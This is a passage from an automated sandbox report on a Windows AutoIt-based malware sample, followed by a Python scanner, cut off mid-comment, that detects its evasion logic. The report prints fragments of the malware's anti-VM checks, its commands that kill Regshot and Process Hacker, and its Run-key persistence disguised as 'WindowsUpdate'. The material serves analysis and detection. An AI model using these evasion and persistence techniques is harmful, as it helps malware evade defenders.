                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_3835765Jump to behavior
                Source: u549ed5dEA.exeStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6680 push ecx; ret 0_2_00CB6693
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB5773 push ecx; ret 0_2_00CB5786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00ED0332 push edi; ret 8_2_00ED0333
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0E06 push ecx; ret 8_2_00EA0E19
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040D17A push ds; retf 14_2_0040D17B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004052D2 push ebx; ret 14_2_004052D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417A9B push cs; iretd 14_2_00417A9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041836D push F20F6127h; retf 14_2_00418372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00403440 push eax; ret 14_2_00403442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00414E3E push 00000056h; retf 14_2_00414E47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F225F pushad ; ret 14_2_013F27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F27FA pushad ; ret 14_2_013F27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014209AD push ecx; mov dword ptr [esp], ecx14_2_014209B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F283D push eax; iretd 14_2_013F2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F135E push eax; iretd 14_2_013F1369

                Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\u549ed5dEA.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | File created: C:\Users\user\ruum\avqj.mp2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | File created: C:\Users\user\ruum\avqj.mp2.exe
Source: C:\Users\user\ruum\avqj.mp2.exe | File created: C:\Users\user\ruum\avqj.mp2.exe.exe
Source: C:\Users\user\Desktop\u549ed5dEA.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | File created: C:\Users\user\ruum\avqj.mp2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\ruum\avqj.mp2.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\ruum\avqj.mp2.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00F125A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 8_2_00F125A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E9FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 8_2_00E9FC8A
Source: C:\Users\user\Desktop\u549ed5dEA.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ruum\avqj.mp2.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: avqj.mp2 PID: 2828, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: avqj.mp2.exe PID: 6848, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: avqj.mp2.exe PID: 4676, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: avqj.mp2.exe PID: 3836, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_8-100052)
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
                Source: avqj.mp2, 00000008.00000003.2212919638.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325260581.0000000001152000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325674821.0000000001155000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324286510.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324343541.000000000114A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2585039223.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2562461798.000000000113A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2528806871.000000000112E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2545485329.0000000001135000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXEB
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp, awggmrd.xls.0.dr, awggmrd.xls.8.dr | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp, awggmrd.xls.0.dr, awggmrd.xls.8.dr | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE>
                Source: avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE`
                Source: avqj.mp2.exe, 0000000F.00000003.2585039223.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2562461798.000000000113A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2528806871.000000000112E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2545485329.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584786311.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584661553.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2398511365.0000000001114000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2400061361.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587135995.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584040457.0000000001142000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3120435066.00000000019C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXEU
                Source: avqj.mp2, 00000008.00000003.2325674821.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327184645.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324138339.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2583954177.0000000001136000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2528806871.000000000112E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2545485329.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587101154.0000000001136000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2398511365.0000000001114000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2400061361.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3013560063.00000000019B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXES
                Source: avqj.mp2, 00000008.00000002.2327160058.0000000001153000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212919638.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325260581.0000000001152000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324286510.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324343541.000000000114A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")H
                Source: avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXE
                Source: avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXESP
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp, awggmrd.xls.0.dr, awggmrd.xls.8.dr | Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0146096E rdtsc
                Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | API coverage: 5.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.5 %
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 occurrences)
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C9F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CB1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CC1FF8 FindFirstFileExA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EEE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EED836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EEDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EFA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EFA488 FindFirstFileW,Sleep,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF65F1 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EBC642 FindFirstFileExW
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF7248 FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF7247 FindFirstFileW
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CB4E14 VirtualQuery,GetSystemInfo
                Source: avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") Then
                Source: avqj.mp2.exe, 00000014.00000003.3257692602.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exe
                Source: avqj.mp2, 00000008.00000003.2212919638.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324266736.0000000001137000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Then{M
                Source: avqj.mp2.exe, 0000000F.00000003.2583805083.000000000116B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe*5
                Source: avqj.mp2.exe, 00000014.00000003.3257692602.00000000019AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.execroso
                Source: avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then\<
                Source: avqj.mp2.exe, 0000000F.00000003.2562461798.0000000001168000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584094552.0000000001172000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2583805083.000000000116B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584722082.000000000117F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exeG
                Source: avqj.mp2.exe, 00000014.00000003.3258604460.00000000019C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exee-
                Source: avqj.mp2, 00000008.00000003.2325418464.0000000001195000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exeC73
                Source: avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exe5FB536C7
                Source: avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe
                Source: avqj.mp2.exe, 0000000F.00000003.2584722082.000000000117F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exet
                Source: awggmrd.xls.8.dr | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: avqj.mp2, 00000008.00000003.2325438490.0000000001193000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe<:
                Source: avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") ThenIM2ev
                Source: avqj.mp2, 00000008.00000003.2325397298.000000000118E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325438490.0000000001193000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exeQ4
                Source: avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then6QFTv
                Source: awggmrd.xls.8.dr | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: avqj.mp2.exe, 00000013.00000003.2570326128.00000000019A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then6QF
                Source: avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then@p
                Source: avqj.mp2.exe, 00000014.00000003.3257351157.000000000196E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then6QF"
                Source: awggmrd.xls.8.dr | Binary or memory string: If ProcessExists("VboxService.exe") Then
                Source: avqj.mp2, 00000008.00000003.2325438490.0000000001193000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exe7:
                Source: avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3128902063.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3112151550.00000000019FF000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258521967.00000000019BF000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258032251.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257469824.00000000019A8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257692602.00000000019AB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258604460.00000000019C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exe
                Source: avqj.mp2.exe, 00000013.00000003.2570326128.00000000019A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") ThenIM2
                Source: avqj.mp2.exe, 00000014.00000003.3257351157.000000000196E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rocessExists("VboxService.exe") ThenIM2
                Source: avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenC
                Source: avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe
                Source: avqj.mp2.exe, 0000000F.00000003.2585544729.0000000001113000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129291939.0000000001993000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: awggmrd.xls.0.dr, awggmrd.xls.8.dr | Binary or memory string: If ProcessExists("VBoxTray.exe") Then
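                The memory strings above are fragments of the AutoIt script carried by avqj.mp2: ProcessExists() checks for VirtualBox and VMware guest tools, a DriveSpaceFree("d:\") < 1 test that looks for the tiny or missing secondary drive typical of a sandbox image, and ProcessClose() calls that terminate Regshot and Process Hacker. The scanner below is an added example, not code from the report or from the sample; it pulls those constructs out of a raw dump buffer (such as one of the .sdmp files listed above) and turns them into a triage verdict. The input buffer is constructed from the strings shown in the report, including the junk bytes that trail "Then" in several dumps; the category names and the ATT&CK mapping are this example's own.

```python
"""Scan a memory dump for the AutoIt anti-analysis logic seen in this report.

Added example, not code from the report or from the sample. Input is raw
bytes such as a .sdmp file; SAMPLE_DUMP is constructed from the strings
the report lists.
"""
import re

# Process names the script looks for, grouped by what their presence means.
# The grouping is this example's own; the names are those quoted in the report.
VM_GUEST_TOOLS = {"vboxservice.exe", "vboxtray.exe", "vmwareservice.exe", "vmwareuser.exe"}
ANALYSIS_TOOLS = {"processhacker.exe", "regshot.exe"}

# The same script shows up in original casing and fully upper-cased
# (ProcessClose(...) versus PROCESSCLOSE("REGSHOT.EXE")), so match
# case-insensitively. Names are captured up to the closing quote, which
# keeps trailing junk such as "ThenIM2ev" out of the match.
_CALL_RE = re.compile(rb'(ProcessExists|ProcessClose)\("([^"]+)"\)', re.IGNORECASE)
# AutoIt's DriveSpaceFree() returns megabytes; "< 1" means under 1 MB free.
_DISK_RE = re.compile(rb'DriveSpaceFree\("([a-z]:\\)"\)\s*<\s*(\d+)', re.IGNORECASE)


def scan(buf: bytes) -> dict:
    """Return the evasion constructs found in buf, keyed by category."""
    found = {"vm_checks": set(), "tool_checks": set(), "tool_kills": set(),
             "unknown_checks": set(), "disk_checks": set(), "mentions": {}}
    for func, name in _CALL_RE.findall(buf):
        target = name.decode("latin-1").lower()
        if func.lower() == b"processclose":
            found["tool_kills"].add(target)
        elif target in VM_GUEST_TOOLS:
            found["vm_checks"].add(target)
        elif target in ANALYSIS_TOOLS:
            found["tool_checks"].add(target)
        else:
            found["unknown_checks"].add(target)
    for drive, mb in _DISK_RE.findall(buf):
        found["disk_checks"].add((drive.decode("latin-1"), int(mb)))
    # Bare names with no surrounding call are weaker evidence (they could be
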